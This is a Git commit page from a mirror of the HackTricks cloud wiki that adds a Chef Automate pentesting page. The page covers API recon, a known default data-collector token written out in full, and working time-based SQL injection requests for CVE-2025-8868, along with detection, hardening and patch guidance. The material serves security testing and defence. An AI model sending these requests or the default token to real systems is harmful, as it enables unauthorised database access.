gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-12 07:40:49 -08:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #216 from HackTricks-wiki/update_Cooking_an_SQL_Injection_Vulnerability_in_Chef_Aut_20250930_182633

Browse Source 
Cooking an SQL Injection Vulnerability in Chef Automate
This commit is contained in:
SirBroccoli
2025-09-30 21:13:40 +02:00
committed by GitHub
parent f96fed548e 7097f55620
commit 8d39c38b58
4 changed files with 171 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
src/SUMMARY.md
View File

@@ -46,8 +46,10 @@
- [Okta Hardening](pentesting-ci-cd/okta-security/okta-hardening.md) - [Okta Hardening](pentesting-ci-cd/okta-security/okta-hardening.md)
- [Serverless.com Security](pentesting-ci-cd/serverless.com-security.md) - [Serverless.com Security](pentesting-ci-cd/serverless.com-security.md)
- [Supabase Security](pentesting-ci-cd/supabase-security.md) - [Supabase Security](pentesting-ci-cd/supabase-security.md)
- [Ansible Tower / AWX / Automation controller Security](pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md) - [Check Automate Security](pentesting-ci-cd/chef-automate-security/README.md)
- [Chef Automate Enumeration And Attacks](pentesting-ci-cd/chef-automate-security/chef-automate-enumeration-and-attacks.md)
- [Vercel Security](pentesting-ci-cd/vercel-security.md) - [Vercel Security](pentesting-ci-cd/vercel-security.md)
- [Ansible Tower / AWX / Automation controller Security](pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md)
- [TODO](pentesting-ci-cd/todo.md) - [TODO](pentesting-ci-cd/todo.md)
# ⛈️ Pentesting Cloud # ⛈️ Pentesting Cloud

18
src/pentesting-ci-cd/chef-automate-security/README.md Normal file
View File

@@ -0,0 +1,18 @@
# Chef Automate Security
{{#include ../../banners/hacktricks-training.md}}
## What is Chef Automate
Chef Automate is a platform for infrastructure automation, compliance, and application delivery. It exposes a web UI (often Angular) that talks to backend gRPC services via a gRPC-Gateway, providing REST-like endpoints under paths such as /api/v0/.
- Common backend components: gRPC services, PostgreSQL (often visible via pq: error prefixes), data-collector ingest service
- Auth mechanisms: user/API tokens and a data collector token header x-data-collector-token
## Enumeration & Attacks
{{#ref}}
chef-automate-enumeration-and-attacks.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

150
src/pentesting-ci-cd/chef-automate-security/chef-automate-enumeration-and-attacks.md Normal file
View File

@@ -0,0 +1,150 @@
# Chef Automate Enumeration & Attacks
{{#include ../../banners/hacktricks-training.md}}
## Overview
This page collects practical techniques to enumerate and attack Chef Automate instances, with emphasis on:
- Discovering gRPC-Gateway-backed REST endpoints and inferring request schemas via validation/error responses
- Abusing the x-data-collector-token authentication header when defaults are present
- Time-based blind SQL injection in the Compliance API (CVE-2025-8868) affecting the filters[].type field in /api/v0/compliance/profiles/search
> Note: Backend responses that include header grpc-metadata-content-type: application/grpc typically indicate a gRPC-Gateway bridging REST calls to gRPC services.
## Recon: Architecture and Fingerprints
- Front-end: Often Angular. Static bundles can hint at REST paths (e.g., /api/v0/...)
- API transport: REST to gRPC via gRPC-Gateway
- Responses may include grpc-metadata-content-type: application/grpc
- Database/driver fingerprints:
- Error bodies starting with pq: strongly suggest PostgreSQL with the Go pq driver
- Interesting Compliance endpoints (auth required):
- POST /api/v0/compliance/profiles/search
- POST /api/v0/compliance/scanner/jobs/search
## Auth: Data Collector Token (x-data-collector-token)
Chef Automate exposes a data collector that authenticates requests via a dedicated header:
- Header: x-data-collector-token
- Risk: Some environments may retain a default token granting access to protected API routes. Known default observed in the wild:
- 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506
If present, this token can be used to call Compliance API endpoints otherwise gated by auth. Always attempt to rotate/disable defaults during hardening.
## API Schema Inference via Error-Driven Discovery
gRPC-Gateway-backed endpoints often leak useful validation errors that describe the expected request model.
For /api/v0/compliance/profiles/search, the backend expects a body with a filters array, where each element is an object with:
- type: string (filter field identifier)
- values: array of strings
Example request shape:
```json
{
"filters": [
{ "type": "name", "values": ["test"] }
]
}
```
Malformed JSON or wrong field types typically trigger 4xx/5xx with hints, and headers indicate the gRPC-Gateway behavior. Use these to map fields and localize injection surfaces.
## Compliance API SQL Injection (CVE-2025-8868)
- Affected endpoint: POST /api/v0/compliance/profiles/search
- Injection point: filters[].type
- Vulnerability class: time-based blind SQL injection in PostgreSQL
- Root cause: Lack of proper parameterization/whitelisting when interpolating the type field into a dynamic SQL fragment (likely used to construct identifiers/WHERE clauses). Crafted values in type are evaluated by PostgreSQL.
Working time-based payload:
```json
{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]}
```
Technique notes:
- Close the original string with a single quote
- Concatenate a subquery that calls pg_sleep(N)
- Re-enter string context via || so the final SQL remains syntactically valid regardless of where type is embedded
### Proof via differential latency
Send paired requests and compare response times to validate server-side execution:
- N = 1 second
```
POST /api/v0/compliance/profiles/search HTTP/1.1
Host: <target>
Content-Type: application/json
x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506
{"filters":[{"type":"name'||(SELECT pg_sleep(1))||'","values":["test"]}]}
```
- N = 5 seconds
```
POST /api/v0/compliance/profiles/search HTTP/1.1
Host: <target>
Content-Type: application/json
x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506
{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]}
```
Observed behavior:
- Response times scale with pg_sleep(N)
- HTTP 500 responses may include pq: details during probing, confirming SQL execution paths
> Tip: Use a timing validator (e.g., multiple trials with statistical comparison) to reduce noise and false positives.
### Impact
Authenticated users—or unauthenticated actors abusing a default x-data-collector-token—can execute arbitrary SQL within Chef Automates PostgreSQL context, risking confidentiality and integrity of compliance profiles, configuration, and telemetry.
### Affected versions / Fix
- CVE: CVE-2025-8868
- Upgrade guidance: Chef Automate 4.13.295 or later (Linux x86) per vendor advisories
## Detection and Forensics
- API layer:
- Monitor 500s on /api/v0/compliance/profiles/search where filters[].type contains quotes ('), concatenation (||), or function references like pg_sleep
- Inspect response headers for grpc-metadata-content-type to identify gRPC-Gateway flows
- Database layer (PostgreSQL):
- Audit for pg_sleep calls and malformed identifier errors (often surfaced with pq: prefixes coming from the Go pq driver)
- Authentication:
- Log and alert on usage of x-data-collector-token, especially known default values, across API paths
## Mitigations and Hardening
- Immediate:
- Rotate/disable default data collector tokens
- Restrict ingress to data collector endpoints; enforce strong, unique tokens
- Code-level:
- Parameterize queries; never string-concatenate SQL fragments
- Strictly whitelist allowed type values on the server (enum)
- Avoid dynamic SQL assembly for identifiers/clauses; if dynamic behavior is required, use safe identifier quoting and explicit whitelists
## Practical Testing Checklist
- Check if x-data-collector-token is accepted and whether the known default works
- Map the Compliance API request schema by inducing validation errors and reading error messages/headers
- Test for SQLi in less obvious “identifier-like” fields (e.g., filters[].type), not just values arrays or top-level text fields
- Use time-based techniques with concatenation to keep SQL syntactically valid across contexts
## References
- [Cooking an SQL Injection Vulnerability in Chef Automate (XBOW blog)](https://xbow.com/blog/cooking-an-sql-injection-vulnerability-in-chef-automate)
- [Timing trace (XBOW)](https://xbow-website.pages.dev/traces/chef-automate-sql-injection/)
- [CVE-2025-8868](https://www.cve.org/CVERecord?id=CVE-2025-8868)
- [gRPC-Gateway](https://github.com/grpc-ecosystem/grpc-gateway)
- [pq PostgreSQL driver for Go](https://github.com/lib/pq)
{{#include ../../banners/hacktricks-training.md}}

1
src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md
View File

@@ -2,4 +2,3 @@
{{#include ../../../banners/hacktricks-training.md}} {{#include ../../../banners/hacktricks-training.md}}
{{#include ../../../banners/hacktricks-training.md}}